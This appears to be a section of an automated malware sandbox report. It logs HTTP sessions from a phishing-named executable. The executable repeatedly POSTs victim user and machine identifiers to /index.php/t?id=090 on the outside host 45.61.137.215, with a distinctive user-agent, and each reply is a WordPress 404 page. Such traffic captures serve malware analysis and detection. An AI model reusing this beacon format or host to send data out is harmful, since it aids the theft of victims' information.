                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                  May 27, 2024 08:32:56.188369036 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                  May 27, 2024 08:32:56.188409090 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                  Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.44976445.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:57.234371901 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:57.241089106 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:59.363845110 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:57 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:59.363871098 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:59.363883972 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:59.363904953 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:32:59.363919973 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:32:59.363982916 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:59.364037037 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:32:59.364052057 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:32:59.364275932 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:32:59.364331007 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.44976545.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:59.553248882 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:59.558264971 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:04.681168079 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:03 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:04.681232929 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:04.681247950 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:04.681324005 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:33:04.681396961 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:33:04.681421041 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:33:04.681864977 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:04.681879044 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:04.681894064 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:04.682384014 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.44976745.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:05.319792032 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:05.324711084 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:07.441765070 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:05 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:07.441808939 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:07.441833973 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:07.441852093 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:07.441890001 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:07.441905022 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
